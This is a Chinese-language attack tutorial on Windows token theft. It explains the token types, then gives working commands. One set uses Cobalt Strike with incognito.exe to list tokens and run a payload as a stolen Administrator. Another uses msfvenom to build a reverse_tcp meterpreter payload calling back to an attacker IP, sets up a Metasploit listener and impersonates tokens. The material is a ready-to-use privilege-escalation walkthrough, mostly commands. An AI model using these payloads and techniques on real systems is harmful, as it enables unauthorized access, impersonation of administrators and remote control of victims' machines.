Windows令牌窃取攻击

Windows令牌窃取攻击

一、Windows令牌

令牌(Token)是系统的临时密钥,相当于账户名和密码,用来决定是否允许这次请求和判断这次请求是属于哪一个用户的,它允许你在不提供密码或其他凭证的前提下,访问网络和系统资源,这些令牌持续存在系统中,除非系统重新启动。

Windows令牌种类:
(1)访问令牌(Access Token)表示访问控制操作主题的系统对象
(2)会话令牌(Session Token)是交互会话中唯一的身份标识符
(3)保密令牌(Security Token)又叫认证令牌或硬件令牌,是一种计算机身份校验的物理设备

Windows访问令牌又分为:
(1)授权令牌(Delegation Token),也叫主令牌,支持交互式会话登录(例如本地用户登录、远程桌面登录)
(2)模拟令牌(Impresonation Token)支持非交互的会话(例如使用 net use访问共享文件夹)

二、令牌窃取攻击

前提:拿到的用户是过了UAC的管理员

1、通过CS进行令牌攻击

(1)通过CS控制了一个过了UAC的管理员

(2)列出用户的令牌

shell incognito.exe list_tokens -u

(3)使用窃取的令牌进行上线

shell incognito.exe execute -c "XB\Administrator" C:\Users\test\Desktop\win10-3\can.exe

2、通过msf进行令牌攻击

(1)通过msfvenom生成木马

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.142.133 lport=4567 -f exe -o payload.exe

(2)进入msfconsole进行监听

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.142.133
set lport 4567
run

(3)加载incognito,进行令牌攻击

load incognito   		                #加载incognito
list_tokens -u    		                #列举令牌
impersonate_token "XB\Administrator" 	#令牌攻击
rev2self 或 drop_token                  #返回之前token

热门相关:我有一座恐怖屋   隐婚试爱:娇妻,好甜!   异能特工:军火皇后   紫府仙缘   嫡嫁千金